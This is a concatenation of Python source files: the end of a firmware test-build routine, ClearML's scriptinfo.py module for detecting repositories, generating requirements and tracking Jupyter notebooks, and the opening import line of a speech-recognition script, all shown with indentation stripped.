# Adding binary path to test build result
if ('result' in worker_result and
worker_result['result'] and
'bin_file' in worker_result):
bin_file = norm_relative_path(worker_result['bin_file'], execution_directory)
test_build['tests'][worker_result['kwargs']['project_id']] = {
"binaries": [
{
"path": bin_file
}
]
}
test_key = worker_result['kwargs']['project_id'].upper()
if report:
print(report[target_name][toolchain_name][test_key][0][0]['output'].rstrip())
print('Image: %s\n' % bin_file)
except:
if p._taskqueue.queue:
p._taskqueue.queue.clear()
sleep(0.5)
p.terminate()
p.join()
raise
else:
pending += 1
if pending >= jobs_count:
break
# Break as soon as possible if there is a failure and we are not
# continuing on build failures
if not result and not continue_on_build_fail:
if p._taskqueue.queue:
p._taskqueue.queue.clear()
sleep(0.5)
p.terminate()
break
p.join()
test_builds = {}
test_builds["%s-%s" % (target_name, toolchain_name)] = test_build
return result, test_builds
def test_spec_from_test_builds(test_builds):
return {
"builds": test_builds
}
|
scriptinfo.py
|
import os
import sys
from copy import copy
from datetime import datetime
from functools import partial
from tempfile import mkstemp, gettempdir
import attr
import logging
import json
from pathlib2 import Path
from threading import Thread, Event
from .util import get_command_output, remove_user_pass_from_url
from ....backend_api import Session
from ....config import deferred_config, VCS_WORK_DIR
from ....debugging import get_logger
from .detectors import GitEnvDetector, GitDetector, HgEnvDetector, HgDetector, Result as DetectionResult
class ScriptInfoError(Exception):
pass
class ScriptRequirements(object):
_detailed_import_report = deferred_config('development.detailed_import_report', False)
_max_requirements_size = 512 * 1024
_packages_remove_version = ('setuptools', )
_ignore_packages = set()
@classmethod
def _get_logger(cls):
return get_logger("Repository Detection")
def __init__(self, root_folder):
self._root_folder = root_folder
def get_requirements(self, entry_point_filename=None, add_missing_installed_packages=False,
detailed_req_report=None):
# noinspection PyBroadException
try:
from ....utilities.pigar.reqs import get_installed_pkgs_detail
from ....utilities.pigar.__main__ import GenerateReqs
installed_pkgs = self._remove_package_versions(
get_installed_pkgs_detail(), self._packages_remove_version)
gr = GenerateReqs(save_path='', project_path=self._root_folder, installed_pkgs=installed_pkgs,
ignores=['.git', '.hg', '.idea', '__pycache__', '.ipynb_checkpoints',
'site-packages', 'dist-packages'])
reqs, try_imports, guess, local_pks = gr.extract_reqs(
module_callback=ScriptRequirements.add_trains_used_packages, entry_point_filename=entry_point_filename)
if add_missing_installed_packages and guess:
for k in guess:
if k not in reqs:
reqs[k] = guess[k]
return self.create_requirements_txt(reqs, local_pks, detailed=detailed_req_report)
except Exception as ex:
self._get_logger().warning("Failed auto-generating package requirements: {}".format(ex))
return '', ''
@staticmethod
def add_trains_used_packages(modules):
# hack: forcefully insert storage modules if we have them
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements,PyUnresolvedReferences
import boto3 # noqa: F401
modules.add('boto3', 'clearml.storage', 0)
except Exception:
pass
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements,PyUnresolvedReferences
from google.cloud import storage # noqa: F401
modules.add('google_cloud_storage', 'clearml.storage', 0)
except Exception:
pass
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements,PyUnresolvedReferences
from azure.storage.blob import ContentSettings # noqa: F401
modules.add('azure_storage_blob', 'clearml.storage', 0)
except Exception:
pass
# bugfix, replace sklearn with scikit-learn name
if 'sklearn' in modules:
sklearn = modules.pop('sklearn', {})
for fname, lines in sklearn.items():
modules.add('scikit_learn', fname, lines)
# if we have torch and it supports tensorboard, we should add that as well
# (because it will not be detected automatically)
if 'torch' in modules and 'tensorboard' not in modules and 'tensorboardX' not in modules:
# noinspection PyBroadException
try:
# see if this version of torch support tensorboard
# noinspection PyPackageRequirements,PyUnresolvedReferences
import torch.utils.tensorboard # noqa: F401
# noinspection PyPackageRequirements,PyUnresolvedReferences
import tensorboard # noqa: F401
modules.add('tensorboard', 'torch', 0)
except Exception:
pass
# remove setuptools, we should not specify this module version. It is installed by default
if 'setuptools' in modules:
modules.pop('setuptools', {})
# add forced requirements:
# noinspection PyBroadException
try:
from ..task import Task
# noinspection PyProtectedMember
for package, version in Task._force_requirements.items():
modules.add(package, 'clearml', 0)
except Exception:
pass
return modules
@staticmethod
def create_requirements_txt(reqs, local_pks=None, detailed=None):
# write requirements.txt
if detailed is None:
detailed = ScriptRequirements._detailed_import_report
# noinspection PyBroadException
try:
conda_requirements = ''
conda_prefix = os.environ.get('CONDA_PREFIX')
if conda_prefix and not conda_prefix.endswith(os.path.sep):
conda_prefix += os.path.sep
if conda_prefix and sys.executable.startswith(conda_prefix):
conda_packages_json = get_command_output(['conda', 'list', '--json'])
conda_packages_json = json.loads(conda_packages_json)
reqs_lower = {k.lower(): (k, v) for k, v in reqs.items()}
for r in conda_packages_json:
# the exception is cudatoolkit which we want to log anyhow
if r.get('name') == 'cudatoolkit' and r.get('version'):
conda_requirements += '{0} {1} {2}\n'.format(r.get('name'), '==', r.get('version'))
continue
# check if this is a pypi package, if it is, leave it outside
if not r.get('channel') or r.get('channel') == 'pypi':
continue
# check if we have it in our required packages
name = r['name'].lower()
# hack support pytorch/torch different naming convention
if name == 'pytorch':
name = 'torch'
k, v = None, None
if name in reqs_lower:
k, v = reqs_lower.get(name, (None, None))
else:
name = name.replace('-', '_')
if name in reqs_lower:
k, v = reqs_lower.get(name, (None, None))
if k and v is not None:
if v.version:
conda_requirements += '{0} {1} {2}\n'.format(k, '==', v.version)
else:
conda_requirements += '{0}\n'.format(k)
except Exception:
conda_requirements = ''
# add forced requirements:
forced_packages = {}
ignored_packages = ScriptRequirements._ignore_packages
# noinspection PyBroadException
try:
from ..task import Task
# noinspection PyProtectedMember
forced_packages = copy(Task._force_requirements)
# noinspection PyProtectedMember
ignored_packages = Task._ignore_requirements | ignored_packages
except Exception:
pass
# python version header
requirements_txt = '# Python ' + sys.version.replace('\n', ' ').replace('\r', ' ') + '\n'
if local_pks:
requirements_txt += '\n# Local modules found - skipping:\n'
for k, v in local_pks.sorted_items():
if v.version:
requirements_txt += '# {0} == {1}\n'.format(k, v.version)
else:
requirements_txt += '# {0}\n'.format(k)
# requirement summary
requirements_txt += '\n'
for k, v in reqs.sorted_items():
if k in ignored_packages or k.lower() in ignored_packages:
continue
version = v.version if v else None
if k in forced_packages:
forced_version = forced_packages.pop(k, None)
if forced_version is not None:
version = forced_version
# requirements_txt += ''.join(['# {0}\n'.format(c) for c in v.comments.sorted_items()])
requirements_txt += ScriptRequirements._make_req_line(k, version or None)
# add forced requirements that we could not find installed on the system
for k in sorted(forced_packages.keys()):
requirements_txt += ScriptRequirements._make_req_line(k, forced_packages.get(k))
requirements_txt_packages_only = requirements_txt
if detailed:
requirements_txt_packages_only = \
requirements_txt + '\n# Skipping detailed import analysis, it is too large\n'
# requirements details (in comments)
requirements_txt += '\n' + \
'# Detailed import analysis\n' \
'# **************************\n'
if local_pks:
for k, v in local_pks.sorted_items():
requirements_txt += '\n'
requirements_txt += '# IMPORT LOCAL PACKAGE {0}\n'.format(k)
requirements_txt += ''.join(['# {0}\n'.format(c) for c in v.comments.sorted_items()])
for k, v in reqs.sorted_items():
if not v:
continue
requirements_txt += '\n'
if k == '-e':
requirements_txt += '# IMPORT PACKAGE {0} {1}\n'.format(k, v.version)
else:
requirements_txt += '# IMPORT PACKAGE {0}\n'.format(k)
requirements_txt += ''.join(['# {0}\n'.format(c) for c in v.comments.sorted_items()])
# make sure we do not exceed the size a size limit
return (requirements_txt if len(requirements_txt) < ScriptRequirements._max_requirements_size
else requirements_txt_packages_only,
conda_requirements)
@staticmethod
def _make_req_line(k, version):
requirements_txt = ''
if k == '-e' and version:
requirements_txt += '{0}\n'.format(version)
elif k.startswith('-e '):
requirements_txt += '{0} {1}\n'.format(k.replace('-e ', '', 1), version or '')
elif version and str(version or ' ').strip()[0].isdigit():
requirements_txt += '{0} {1} {2}\n'.format(k, '==', version)
elif version and str(version).strip():
requirements_txt += '{0} {1}\n'.format(k, version)
else:
requirements_txt += '{0}\n'.format(k)
return requirements_txt
@staticmethod
def _remove_package_versions(installed_pkgs, package_names_to_remove_version):
installed_pkgs = {k: (v[0], None if str(k) in package_names_to_remove_version else v[1])
for k, v in installed_pkgs.items()}
return installed_pkgs
class _JupyterObserver(object):
_thread = None
_exit_event = Event()
_sync_event = Event()
_sample_frequency = 30.
_first_sample_frequency = 3.
_jupyter_history_logger = None
_store_notebook_artifact = deferred_config('development.store_jupyter_notebook_artifact', True)
@classmethod
def _get_logger(cls):
return get_logger("Repository Detection")
@classmethod
def observer(cls, jupyter_notebook_filename, log_history):
if cls._thread is not None:
# order of signaling is important!
cls._exit_event.set()
cls._sync_event.set()
cls._thread.join()
if log_history and cls._jupyter_history_logger is None:
cls._jupyter_history_logger = _JupyterHistoryLogger()
cls._jupyter_history_logger.hook()
cls._sync_event.clear()
cls._exit_event.clear()
cls._thread = Thread(target=cls._daemon, args=(jupyter_notebook_filename, ))
cls._thread.daemon = True
cls._thread.start()
@classmethod
def signal_sync(cls, *_, **__):
cls._sync_event.set()
@classmethod
def close(cls):
if not cls._thread:
return
cls._exit_event.set()
cls._sync_event.set()
cls._thread.join()
cls._thread = None
@classmethod
def _daemon(cls, jupyter_notebook_filename):
from clearml import Task
# load jupyter notebook package
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements
from nbconvert.exporters.script import ScriptExporter
_script_exporter = ScriptExporter()
except Exception as ex:
cls._get_logger().warning('Could not read Jupyter Notebook: {}'.format(ex))
return
# load pigar
# noinspection PyBroadException
try:
from ....utilities.pigar.reqs import get_installed_pkgs_detail, file_import_modules
from ....utilities.pigar.modules import ReqsModules
from ....utilities.pigar.log import logger
logger.setLevel(logging.WARNING)
except Exception:
file_import_modules = None
# load IPython
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements
from IPython import get_ipython
except Exception:
# should not happen
get_ipython = None
# setup local notebook files
if jupyter_notebook_filename:
notebook = Path(jupyter_notebook_filename)
local_jupyter_filename = jupyter_notebook_filename
else:
notebook = None
fd, local_jupyter_filename = mkstemp(suffix='.ipynb')
os.close(fd)
last_update_ts = None
counter = 0
prev_script_hash = None
# noinspection PyBroadException
try:
from ....version import __version__
our_module = cls.__module__.split('.')[0], __version__
except Exception:
our_module = None
# noinspection PyBroadException
try:
import re
replace_ipython_pattern = re.compile(r'\n([ \t]*)get_ipython\(\)')
replace_ipython_display_pattern = re.compile(r'\n([ \t]*)display\(')
except Exception:
replace_ipython_pattern = None
replace_ipython_display_pattern = None
# main observer loop, check if we need to exit
while not cls._exit_event.wait(timeout=0.):
# wait for timeout or sync event
cls._sync_event.wait(cls._sample_frequency if counter else cls._first_sample_frequency)
cls._sync_event.clear()
counter += 1
# noinspection PyBroadException
try:
# if there is no task connected, do nothing
task = Task.current_task()
if not task:
continue
script_code = None
fmodules = None
current_cell = None
# if we have a local file:
if notebook:
if not notebook.exists():
continue
# check if notebook changed
if last_update_ts is not None and notebook.stat().st_mtime - last_update_ts <= 0:
continue
last_update_ts = notebook.stat().st_mtime
else:
# serialize notebook to a temp file
if cls._jupyter_history_logger:
script_code, current_cell = cls._jupyter_history_logger.history_to_str()
else:
# noinspection PyBroadException
try:
# noinspection PyBroadException
try:
os.unlink(local_jupyter_filename)
except Exception:
pass
get_ipython().run_line_magic('history', '-t -f {}'.format(local_jupyter_filename))
with open(local_jupyter_filename, 'r') as f:
script_code = f.read()
# load the modules
from ....utilities.pigar.modules import ImportedModules
fmodules = ImportedModules()
for nm in set([str(m).split('.')[0] for m in sys.modules]):
fmodules.add(nm, 'notebook', 0)
except Exception:
continue
# get notebook python script
if script_code is None and local_jupyter_filename:
script_code, _ = _script_exporter.from_filename(local_jupyter_filename)
if cls._store_notebook_artifact:
# also upload the jupyter notebook as artifact
task.upload_artifact(
name='notebook',
artifact_object=Path(local_jupyter_filename),
preview='See `notebook preview` artifact',
metadata={'UPDATE': datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')},
wait_on_upload=True,
)
# noinspection PyBroadException
try:
from nbconvert.exporters import HTMLExporter # noqa
html, _ = HTMLExporter().from_filename(filename=local_jupyter_filename)
local_html = Path(gettempdir()) / 'notebook_{}.html'.format(task.id)
with open(local_html.as_posix(), 'wt', encoding="utf-8") as f:
f.write(html)
task.upload_artifact(
name='notebook preview', artifact_object=local_html,
preview='Click `FILE PATH` link',
metadata={'UPDATE': datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')},
delete_after_upload=True,
wait_on_upload=True,
)
except Exception:
pass
current_script_hash = hash(script_code + (current_cell or ''))
if prev_script_hash and prev_script_hash == current_script_hash:
continue
# remove ipython direct access from the script code
# we will not be able to run them anyhow
if replace_ipython_pattern:
script_code = replace_ipython_pattern.sub(r'\n# \g<1>get_ipython()', script_code)
if replace_ipython_display_pattern:
script_code = replace_ipython_display_pattern.sub(r'\n\g<1>print(', script_code)
requirements_txt = ''
conda_requirements = ''
# parse jupyter python script and prepare pip requirements (pigar)
# if backend supports requirements
if file_import_modules and Session.check_min_api_version('2.2'):
if fmodules is None:
fmodules, _ = file_import_modules(
notebook.parts[-1] if notebook else 'notebook', script_code)
if current_cell:
cell_fmodules, _ = file_import_modules(
notebook.parts[-1] if notebook else 'notebook', current_cell)
# noinspection PyBroadException
try:
fmodules |= cell_fmodules
except Exception:
pass
# add current cell to the script
if current_cell:
script_code += '\n' + current_cell
fmodules = ScriptRequirements.add_trains_used_packages(fmodules)
# noinspection PyUnboundLocalVariable
installed_pkgs = get_installed_pkgs_detail()
# make sure we are in installed packages
if our_module and (our_module[0] not in installed_pkgs):
installed_pkgs[our_module[0]] = our_module
# noinspection PyUnboundLocalVariable
reqs = ReqsModules()
for name in fmodules:
if name in installed_pkgs:
pkg_name, version = installed_pkgs[name]
reqs.add(pkg_name, version, fmodules[name])
requirements_txt, conda_requirements = ScriptRequirements.create_requirements_txt(reqs)
# update script
prev_script_hash = current_script_hash
data_script = task.data.script
data_script.diff = script_code
data_script.requirements = {'pip': requirements_txt, 'conda': conda_requirements}
# noinspection PyProtectedMember
task._update_script(script=data_script)
# update requirements
# noinspection PyProtectedMember
task._update_requirements(requirements=requirements_txt)
except Exception:
pass
class ScriptInfo(object):
max_diff_size_bytes = 500000
plugins = [GitEnvDetector(), HgEnvDetector(), HgDetector(), GitDetector()]
""" Script info detection plugins, in order of priority """
@classmethod
def _get_logger(cls):
return get_logger("Repository Detection")
@classmethod
def _jupyter_install_post_store_hook(cls, jupyter_notebook_filename, log_history=False):
# noinspection PyBroadException
try:
if 'IPython' in sys.modules:
# noinspection PyPackageRequirements
from IPython import get_ipython
if get_ipython():
_JupyterObserver.observer(jupyter_notebook_filename, log_history)
get_ipython().events.register('pre_run_cell', _JupyterObserver.signal_sync)
if log_history:
get_ipython().events.register('post_run_cell', _JupyterObserver.signal_sync)
except Exception:
pass
@classmethod
def _get_jupyter_notebook_filename(cls):
# check if we are running in vscode, we have the jupyter notebook defined:
if 'IPython' in sys.modules:
# noinspection PyBroadException
try:
from IPython import get_ipython # noqa
ip = get_ipython()
# vscode-jupyter PR #8531 added this variable
local_ipynb_file = ip.__dict__.get('user_ns', {}).get('__vsc_ipynb_file__') if ip else None
if local_ipynb_file:
# now replace the .ipynb with .py
# we assume we will have that file available for monitoring
local_ipynb_file = Path(local_ipynb_file)
script_entry_point = local_ipynb_file.with_suffix('.py').as_posix()
# install the post store hook,
# notice that if we do not have a local file we serialize/write every time the entire notebook
cls._jupyter_install_post_store_hook(local_ipynb_file.as_posix(), log_history=False)
return script_entry_point
except Exception:
pass
if not (sys.argv[0].endswith(os.path.sep + 'ipykernel_launcher.py') or
sys.argv[0].endswith(os.path.join(os.path.sep, 'ipykernel', '__main__.py'))) \
or len(sys.argv) < 3 or not sys.argv[2].endswith('.json'):
return None
server_info = None
# we can safely assume that we can import the notebook package here
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements
from notebook.notebookapp import list_running_servers
import requests
current_kernel = sys.argv[2].split(os.path.sep)[-1].replace('kernel-', '').replace('.json', '')
# noinspection PyBroadException
try:
server_info = next(list_running_servers())
except Exception:
# on some jupyter notebook versions this function can crash on parsing the json file,
# we will parse it manually here
# noinspection PyPackageRequirements
import ipykernel
from glob import glob
import json
for f in glob(os.path.join(os.path.dirname(ipykernel.get_connection_file()), '??server-*.json')):
# noinspection PyBroadException
try:
with open(f, 'r') as json_data:
server_info = json.load(json_data)
except Exception:
server_info = None
if server_info:
break
cookies = None
password = None
if server_info and server_info.get('password'):
# we need to get the password
from ....config import config
password = config.get('development.jupyter_server_password', '')
if not password:
cls._get_logger().warning(
'Password protected Jupyter Notebook server was found! '
'Add `sdk.development.jupyter_server_password=<jupyter_password>` to ~/clearml.conf')
return os.path.join(os.getcwd(), 'error_notebook_not_found.py')
r = requests.get(url=server_info['url'] + 'login')
cookies = {'_xsrf': r.cookies.get('_xsrf', '')}
r = requests.post(server_info['url'] + 'login?next', cookies=cookies,
data={'_xsrf': cookies['_xsrf'], 'password': password})
cookies.update(r.cookies)
auth_token = server_info.get('token') or os.getenv('JUPYTERHUB_API_TOKEN') or ''
try:
r = requests.get(
url=server_info['url'] + 'api/sessions', cookies=cookies,
headers={'Authorization': 'token {}'.format(auth_token), })
except requests.exceptions.SSLError:
# disable SSL check warning
from urllib3.exceptions import InsecureRequestWarning
# noinspection PyUnresolvedReferences
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
# fire request
r = requests.get(
url=server_info['url'] + 'api/sessions', cookies=cookies,
headers={'Authorization': 'token {}'.format(auth_token), }, verify=False)
# enable SSL check warning
import warnings
warnings.simplefilter('default', InsecureRequestWarning)
# send request to the jupyter server
try:
r.raise_for_status()
except Exception as ex:
cls._get_logger().warning('Failed accessing the jupyter server{}: {}'.format(
' [password={}]'.format(password) if server_info.get('password') else '', ex))
return os.path.join(os.getcwd(), 'error_notebook_not_found.py')
notebooks = r.json()
cur_notebook = None
for n in notebooks:
if n['kernel']['id'] == current_kernel:
cur_notebook = n
break
notebook_path = cur_notebook['notebook'].get('path', '')
notebook_name = cur_notebook['notebook'].get('name', '')
is_google_colab = False
# check if this is google.colab, then there is no local file
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements
from IPython import get_ipython
if get_ipython() and 'google.colab' in get_ipython().extension_manager.loaded:
is_google_colab = True
except Exception:
pass
if is_google_colab:
script_entry_point = str(notebook_name or 'notebook').replace(
'>', '_').replace('<', '_').replace('.ipynb', '.py')
if not script_entry_point.lower().endswith('.py'):
script_entry_point += '.py'
local_ipynb_file = None
else:
# always slash, because this is from uri (so never backslash not even on windows)
entry_point_filename = notebook_path.split('/')[-1]
# now we should try to find the actual file
entry_point = (Path.cwd() / entry_point_filename).absolute()
if not entry_point.is_file():
entry_point = (Path.cwd() / notebook_path).absolute()
# fix for VSCode pushing uuid at the end of the notebook name.
if not entry_point.exists():
# noinspection PyBroadException
try:
alternative_entry_point = '-'.join(entry_point_filename.split('-')[:-5])+'.ipynb'
# now we should try to find the actual file
entry_point_alternative = (Path.cwd() / alternative_entry_point).absolute()
if not entry_point_alternative.is_file():
entry_point_alternative = (Path.cwd() / alternative_entry_point).absolute()
# If we found it replace it
if entry_point_alternative.exists():
entry_point = entry_point_alternative
except Exception as ex:
cls._get_logger().warning('Failed accessing jupyter notebook {}: {}'.format(notebook_path, ex))
# get local ipynb for observer
local_ipynb_file = entry_point.as_posix()
# now replace the .ipynb with .py
# we assume we will have that file available with the Jupyter notebook plugin
entry_point = entry_point.with_suffix('.py')
script_entry_point = entry_point.as_posix()
# install the post store hook,
# notice that if we do not have a local file we serialize/write every time the entire notebook
cls._jupyter_install_post_store_hook(local_ipynb_file, is_google_colab)
return script_entry_point
except Exception:
return None
@classmethod
def _get_entry_point(cls, repo_root, script_path):
repo_root = Path(repo_root).absolute()
try:
# Use os.path.relpath as it calculates up dir movements (../)
entry_point = os.path.relpath(
str(script_path), str(cls._get_working_dir(repo_root, return_abs=True)))
except ValueError:
# Working directory not under repository root
entry_point = script_path.relative_to(repo_root)
return Path(entry_point).as_posix()
@classmethod
def _cwd(cls):
# return the current working directory (solve for hydra changing it)
# check if running with hydra
if sys.modules.get('hydra'):
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements
import hydra # noqa
return Path(hydra.utils.get_original_cwd()).absolute()
except Exception:
pass
return Path.cwd().absolute()
@classmethod
def _get_working_dir(cls, repo_root, return_abs=False):
# get the repository working directory (might be different from actual cwd)
repo_root = Path(repo_root).absolute()
cwd = cls._cwd()
try:
# do not change: test if we are under the repo root folder, it will throw an exception if we are not
relative = cwd.relative_to(repo_root).as_posix()
return cwd.as_posix() if return_abs else relative
except ValueError:
# Working directory not under repository root, default to repo root
return repo_root.as_posix() if return_abs else '.'
@classmethod
def _absolute_path(cls, file_path, cwd):
# return the absolute path, relative to a specific working directory (cwd)
file_path = Path(file_path)
if file_path.is_absolute():
return file_path.as_posix()
# Convert to absolute and squash 'path/../folder'
return os.path.abspath((Path(cwd).absolute() / file_path).as_posix())
@classmethod
def _get_script_code(cls, script_path):
# noinspection PyBroadException
try:
with open(script_path, 'r') as f:
script_code = f.read()
return script_code
except Exception:
pass
return ''
@classmethod
def _get_script_info(
cls, filepaths, check_uncommitted=True, create_requirements=True, log=None,
uncommitted_from_remote=False, detect_jupyter_notebook=True,
add_missing_installed_packages=False, detailed_req_report=None, force_single_script=False):
jupyter_filepath = cls._get_jupyter_notebook_filename() if detect_jupyter_notebook else None
if jupyter_filepath:
scripts_path = [Path(os.path.normpath(jupyter_filepath)).absolute()]
else:
cwd = cls._cwd()
scripts_path = [Path(cls._absolute_path(os.path.normpath(f), cwd)) for f in filepaths if f]
scripts_path = [f for f in scripts_path if f.exists()]
if not scripts_path:
raise ScriptInfoError(
"Script file {} could not be found".format(filepaths)
)
scripts_dir = [f.parent for f in scripts_path]
def _log(msg, *args, **kwargs):
if not log:
return
log.warning(
"Failed auto-detecting task repository: {}".format(
msg.format(*args, **kwargs)
)
)
script_dir = scripts_dir[0]
script_path = scripts_path[0]
if force_single_script:
plugin = None
else:
plugin = next((p for p in cls.plugins if p.exists(script_dir)), None)
repo_info = DetectionResult()
messages = []
auxiliary_git_diff = None
if not plugin:
if log:
log.info("No repository found, storing script code instead")
else:
try:
repo_info = plugin.get_info(
str(script_dir), include_diff=check_uncommitted, diff_from_remote=uncommitted_from_remote)
except SystemExit:
raise
except Exception as ex:
_log("no info for {} ({})", scripts_dir, ex)
else:
if repo_info.is_empty():
_log("no info for {}", scripts_dir)
repo_root = repo_info.root or script_dir
if not plugin:
working_dir = '.'
entry_point = str(script_path.name)
else:
# allow to override the VCS working directory (notice relative to the git repo)
# because we can have a sync folder on remote pycharm sessions
# not syncing from the Git repo, but from a subfolder, so the pycharm plugin need to pass the override
working_dir = VCS_WORK_DIR.get() if VCS_WORK_DIR.get() else cls._get_working_dir(repo_root)
entry_point = cls._get_entry_point(repo_root, script_path)
if check_uncommitted:
diff = cls._get_script_code(script_path.as_posix()) \
if not plugin or not repo_info.commit else repo_info.diff
# make sure diff is not too big:
if len(diff) > cls.max_diff_size_bytes:
messages.append(
"======> WARNING! Git diff to large to store "
"({}kb), skipping uncommitted changes <======".format(len(diff)//1024))
auxiliary_git_diff = diff
diff = '# WARNING! git diff too large to store, clear this section to execute without it.\n' \
'# full git diff available in Artifacts/auxiliary_git_diff\n' \
'# Clear the section before enqueueing Task!\n'
else:
diff = ''
# if this is not jupyter, get the requirements.txt
requirements = ''
conda_requirements = ''
# create requirements if backend supports requirements
# if jupyter is present, requirements will be created in the background, when saving a snapshot
if not jupyter_filepath and Session.check_min_api_version('2.2'):
script_requirements = ScriptRequirements(
Path(repo_root).as_posix() if repo_info.url else script_path.as_posix())
if create_requirements:
requirements, conda_requirements = script_requirements.get_requirements(
entry_point_filename=script_path.as_posix()
if not repo_info.url and script_path.is_file() else None,
add_missing_installed_packages=add_missing_installed_packages,
detailed_req_report=detailed_req_report,
)
else:
script_requirements = None
script_info = dict(
repository=remove_user_pass_from_url(repo_info.url),
branch=repo_info.branch,
version_num=repo_info.commit,
entry_point=entry_point,
working_dir=working_dir,
diff=diff,
requirements={'pip': requirements, 'conda': conda_requirements} if requirements else None,
binary='python{}.{}'.format(sys.version_info.major, sys.version_info.minor),
repo_root=repo_root,
jupyter_filepath=jupyter_filepath,
)
# if repo_info.modified:
# messages.append(
# "======> WARNING! UNCOMMITTED CHANGES IN REPOSITORY {} <======".format(
# script_info.get("repository", "")
# )
# )
if not any(script_info.values()):
script_info = None
return (ScriptInfoResult(script=script_info, warning_messages=messages, auxiliary_git_diff=auxiliary_git_diff),
script_requirements)
@classmethod
def get(cls, filepaths=None, check_uncommitted=True, create_requirements=True, log=None,
uncommitted_from_remote=False, detect_jupyter_notebook=True, add_missing_installed_packages=False,
detailed_req_report=None, force_single_script=False):
try:
if not filepaths:
filepaths = [sys.argv[0], ]
return cls._get_script_info(
filepaths=filepaths,
check_uncommitted=check_uncommitted,
create_requirements=create_requirements, log=log,
uncommitted_from_remote=uncommitted_from_remote,
detect_jupyter_notebook=detect_jupyter_notebook,
add_missing_installed_packages=add_missing_installed_packages,
detailed_req_report=detailed_req_report,
force_single_script=force_single_script,
)
except SystemExit:
pass
except BaseException as ex:
if log:
log.warning("Failed auto-detecting task repository: {}".format(ex))
return ScriptInfoResult(), None
@classmethod
def is_running_from_module(cls):
# noinspection PyBroadException
try:
return '__main__' in sys.modules and vars(sys.modules['__main__'])['__package__']
except Exception:
return False
@classmethod
def detect_running_module(cls, script_dict):
# noinspection PyBroadException
try:
# If this is jupyter, do not try to detect the running module, we know what we have.
if script_dict.get('jupyter_filepath'):
return script_dict
if cls.is_running_from_module():
argvs = ''
git_root = os.path.abspath(str(script_dict['repo_root'])) if script_dict['repo_root'] else None
for a in sys.argv[1:]:
if git_root and os.path.exists(a):
# check if common to project:
a_abs = os.path.abspath(a)
if os.path.commonpath([a_abs, git_root]) == git_root:
# adjust path relative to working dir inside git repo
a = ' ' + os.path.relpath(
a_abs, os.path.join(git_root, str(script_dict['working_dir'])))
argvs += ' {}'.format(a)
# noinspection PyBroadException
try:
module_name = vars(sys.modules['__main__'])['__spec__'].name
except Exception:
module_name = vars(sys.modules['__main__'])['__package__']
# update the script entry point to match the real argv and module call
script_dict['entry_point'] = '-m {}{}'.format(module_name, (' ' + argvs) if argvs else '')
except Exception:
pass
return script_dict
@classmethod
def close(cls):
_JupyterObserver.close()
@attr.s
class ScriptInfoResult(object):
script = attr.ib(default=None)
warning_messages = attr.ib(factory=list)
auxiliary_git_diff = attr.ib(default=None)
class _JupyterHistoryLogger(object):
_reg_replace_ipython = r'\n([ \t]*)get_ipython\(\)'
_reg_replace_magic = r'\n([ \t]*)%'
_reg_replace_bang = r'\n([ \t]*)!'
def __init__(self):
self._exception_raised = False
self._cells_code = {}
self._counter = 0
self._ip = None
self._current_cell = None
# noinspection PyBroadException
try:
import re
self._replace_ipython_pattern = re.compile(self._reg_replace_ipython)
self._replace_magic_pattern = re.compile(self._reg_replace_magic)
self._replace_bang_pattern = re.compile(self._reg_replace_bang)
except Exception:
self._replace_ipython_pattern = None
self._replace_magic_pattern = None
self._replace_bang_pattern = None
def hook(self, ip=None):
if not ip:
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements
from IPython import get_ipython
except Exception:
return
self._ip = get_ipython()
else:
self._ip = ip
# noinspection PyBroadException
try:
# if this is colab, the callbacks do not contain the raw_cell content, so we have to patch it
if 'google.colab' in self._ip.extension_manager.loaded:
self._ip._org_run_cell = self._ip.run_cell
self._ip.run_cell = partial(self._patched_run_cell, self._ip)
except Exception:
pass
# start with the current history
self._initialize_history()
self._ip.events.register('post_run_cell', self._post_cell_callback)
self._ip.events.register('pre_run_cell', self._pre_cell_callback)
self._ip.set_custom_exc((Exception,), self._exception_callback)
def _patched_run_cell(self, shell, *args, **kwargs):
# noinspection PyBroadException
try:
raw_cell = kwargs.get('raw_cell') or args[0]
self._current_cell = raw_cell
except Exception:
pass
# noinspection PyProtectedMember
return shell._org_run_cell(*args, **kwargs)
def history(self, filename):
with open(filename, 'wt') as f:
for k, v in sorted(self._cells_code.items(), key=lambda p: p[0]):
f.write(v)
def history_to_str(self):
# return a pair: (history as str, current cell if we are in still in cell execution otherwise None)
return '\n'.join(v for k, v in sorted(self._cells_code.items(), key=lambda p: p[0])), self._current_cell
# noinspection PyUnusedLocal
def _exception_callback(self, shell, etype, value, tb, tb_offset=None):
self._exception_raised = True
return shell.showtraceback()
def _pre_cell_callback(self, *args, **_):
# noinspection PyBroadException
try:
if args:
self._current_cell = args[0].raw_cell
# we might have this value from somewhere else
if self._current_cell:
self._current_cell = self._conform_code(self._current_cell, replace_magic_bang=True)
except Exception:
pass
def _post_cell_callback(self, *_, **__):
# noinspection PyBroadException
try:
self._current_cell = None
if self._exception_raised:
# do nothing
self._exception_raised = False
return
self._exception_raised = False
# add the cell history
# noinspection PyBroadException
try:
cell_code = '\n' + self._ip.history_manager.input_hist_parsed[-1]
except Exception:
return
# fix magic / bang in code
cell_code = self._conform_code(cell_code)
self._cells_code[self._counter] = cell_code
self._counter += 1
except Exception:
pass
def _initialize_history(self):
# only once
if -1 in self._cells_code:
return
# noinspection PyBroadException
try:
cell_code = '\n' + '\n'.join(self._ip.history_manager.input_hist_parsed[:-1])
except Exception:
return
cell_code = self._conform_code(cell_code)
self._cells_code[-1] = cell_code
def _conform_code(self, cell_code, replace_magic_bang=False):
# fix magic / bang in code
if self._replace_ipython_pattern:
cell_code = self._replace_ipython_pattern.sub(r'\n# \g<1>get_ipython()', cell_code)
if replace_magic_bang and self._replace_magic_pattern and self._replace_bang_pattern:
cell_code = self._replace_magic_pattern.sub(r'\n# \g<1>%', cell_code)
cell_code = self._replace_bang_pattern.sub(r'\n# \g<1>!', cell_code)
return cell_code
|
Speech_Recognizer.py
|
import speech_recognition as sr
